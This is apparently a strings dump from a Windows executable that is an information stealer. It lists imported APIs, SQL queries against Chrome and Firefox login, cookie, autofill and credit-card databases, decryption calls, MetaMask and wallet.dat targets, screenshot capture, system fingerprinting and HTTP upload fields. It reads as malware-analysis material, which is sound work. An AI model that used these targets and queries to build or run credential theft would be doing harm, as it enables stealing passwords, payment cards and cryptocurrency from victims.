!This program cannot be run in DOS mode.
`.rdata
@.data
t VVSPj
L$dQVP
L$dQVP
D$4PS~
|$(;T$0
D$<PSV
j.Xf;D$<t
PPPWPP
jtXf9F
4SVWhP
jtXf9F
jtXf9F
t$dPPV
D$L+D$DP
D$L+D$DPV
+D$Dh
D$\+D$TPQQW
L$\QVP
L$\QVP
QQSVWh
QSVWjAj@
QQQQQPQj
Fkernel32.dll
LoadLibraryW
GetUserDefaultLocaleName
GetEnvironmentVariableW
lstrlenA
FreeLibrary
GlobalFree
CreateFileW
GetTimeZoneInformation
GetProcAddress
lstrcpyA
ReadFile
lstrlenW
WriteFile
SetCurrentDirectoryW
lstrcmpW
CloseHandle
GetLastError
FindNextFileW
FindFirstFileW
Process32First
GetFileSize
OpenMutexW
WideCharToMultiByte
GlobalAlloc
GetCurrentProcess
ExitProcess
CreateMutexW
GetSystemWow64DirectoryW
GetLocaleInfoW
GlobalMemoryStatusEx
GetDriveTypeW
OpenProcess
LocalAlloc
lstrcmpiW
SetEnvironmentVariableW
CopyFileW
GetModuleFileNameW
lstrcmpA
GetSystemInfo
LocalFree
Process32Next
DeleteFileW
lstrcpynA
MultiByteToWideChar
FindClose
CreateToolhelp32Snapshot
HeapFree
GetUserDefaultLCID
GetLogicalDriveStringsW
Shlwapi.dll
PathMatchSpecW
StrCpyW
StrStrIW
StrStrW
PathCombineW
StrRChrW
StrToIntA
StrToIntW
StrStrA
StrToInt64ExW
Ole32.dll
CoInitialize
CoCreateInstance
WinInet.dll
Shell32.dll
User32.dll
Advapi32.dll
Bcrypt.dll
Crypt32.dll
HttpQueryInfoA
HttpOpenRequestW
InternetReadFileExW
InternetOpenUrlW
HttpQueryInfoW
InternetCloseHandle
InternetConnectW
InternetSetOptionW
InternetOpenW
HttpSendRequestW
InternetReadFile
InternetOpenUrlA
ShellExecuteW
SHGetFolderPathW
SHGetSpecialFolderPathW
ConvertSidToStringSidW
OpenProcessToken
SystemFunction036
RegEnumKeyExW
RegCloseKey
DuplicateTokenEx
GetUserNameW
RegOpenKeyExW
RegQueryValueExW
GetTokenInformation
CreateProcessWithTokenW
CharUpperW
EnumDisplayDevicesW
GetClientRect
GetDesktopWindow
GetSystemMetrics
ReleaseDC
wsprintfW
CryptStringToBinaryA
CryptStringToBinaryW
CryptBinaryToStringW
CryptUnprotectData
tlgrm_
dscrd_
URL:%s
USR:%s
PASS:%s
%d) %s
- Locale: %s
- OS: %s
- RAM: %d MB
- Time zone: %c%ld minutes from GMT
- Display size: %dx%d
- Architecture: x%d
- CPU: %s (%d cores)
- Display Devices:
formhistory.sqlite
logins.json
\autofill.txt
\cookies.txt
\passwords.txt
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Type: multipart/form-data; boundary=
Content-Type: text/plain;
User Data
wallets
scrnsht_
sstmnfo_
token:
nss3.dll
sqlite3.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Web Data
Login Data
sqlite3_prepare_v2
sqlite3_open16
sqlite3_close
sqlite3_step
sqlite3_finalize
sqlite3_column_text16
sqlite3_column_bytes16
sqlite3_column_blob
SELECT origin_url, username_value, password_value FROM logins
SELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies
SELECT name, value FROM autofill
Stable
SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
cookies.sqlite
machineId=
&configId=
"encrypted_key":"
stats_version":"
Content-Type: application/x-object
Content-Disposition: form-data; name="file"; filename="
MachineGuid
image/jpeg
GdiPlus.dll
Gdi32.dll
GdiplusStartup
GdipDisposeImage
GdipGetImageEncoders
GdipGetImageEncodersSize
GdipCreateBitmapFromHBITMAP
GdipSaveImageToFile
BitBlt
CreateCompatibleBitmap
CreateCompatibleDC
DeleteObject
GetObjectW
SelectObject
SetStretchBltMode
StretchBlt
SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards
Cookies
Network\Cookies
NUM:%s
HOLDER:%s
EXP:%s/%s
\CC.txt
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
SECITEM_FreeItem
hostname":"
","httpRealm":
encryptedUsername":"
","encryptedPassword":"
","guid":
Profiles
S-1-5-18
Default
Profile %d
extensions
xtntns_
prefs.js
storage\default
MetaMask
.sqlite
"webextension@metamask.io":"
explorer.exe
SOFTWARE\Microsoft\Cryptography
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
\ffcookies.txt
Local State
wallet.dat
6ef182aaa19660fad619838fa9b3b098
V
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
LoadLibraryA
GetProcAddress
lstrlenA
LocalAlloc
KERNEL32.dll
CoInitialize
ole32.dll
DuckTales
AYAYAYAY1337